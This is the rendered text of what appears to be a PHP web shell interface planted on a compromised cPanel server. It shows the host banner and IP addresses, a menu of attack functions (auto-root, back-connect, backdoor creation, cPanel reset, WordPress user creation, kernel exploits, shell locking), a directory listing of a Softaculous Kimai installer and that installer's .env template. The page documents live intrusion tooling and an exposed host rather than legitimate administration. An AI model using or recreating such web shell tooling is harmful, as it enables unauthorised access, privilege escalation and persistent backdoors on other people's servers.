Linux s3.cpanelhost.co.in 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
: 65.108.44.247 | : 216.73.217.134
Cant Read [ /etc/named.conf ]
7.4.33
teac11783
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
kimai /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
1.21
KB
-rw-r--r--
.htaccess
46
B
-rw-r--r--
_clone.php
5.52
KB
-rw-r--r--
edit.php
7.24
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.69
KB
-rw-r--r--
fileindex.php
327
B
-rw-r--r--
import.php
3.9
KB
-rw-r--r--
info.xml
2.83
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.43
KB
-rw-r--r--
install.xml
569
B
-rw-r--r--
kimai.sql
39.67
KB
-rw-r--r--
kimai.zip
113.66
MB
-rw-r--r--
md5
2.77
KB
-rw-r--r--
notes.txt
1.35
KB
-rw-r--r--
update_pass.php
517
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
#================================================================================ # READ THIS FIRST: https://www.kimai.org/documentation/local-yaml.html #================================================================================ # Configure your database connection and the correct server version - find it with: SELECT VERSION(); DATABASE_URL=mysql://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]:3306/[[softdb]]?charset=utf8mb4&serverVersion=[[dbser_ver]] # You MUST change this to a long and random character sequence, e.g.: php -r 'echo bin2hex(random_bytes(32));' APP_SECRET=[[APP_SECRET]] # The base URL of your Kimai installation DEFAULT_URI=https://127.0.0.1:8000 # SECURITY WARNING: you SHOULD configure the allowed domain names for your installation TRUSTED_HOSTS=[[domhost]] # Outgoing emails use this email-address as sender MAILER_FROM=kimai@example.com # Email connection - see https://www.kimai.org/documentation/emails.html MAILER_URL=null://null # Running behind reverse proxies? Try these: # TRUSTED_PROXIES=127.0.0.1,127.0.0.2 # regexp to define allowed frontend origins for API requests CORS_ALLOW_ORIGIN=^https?://localhost(:[0-9]+)?$ # only change to "dev" if you are developing with/for Kimai APP_ENV=prod
Close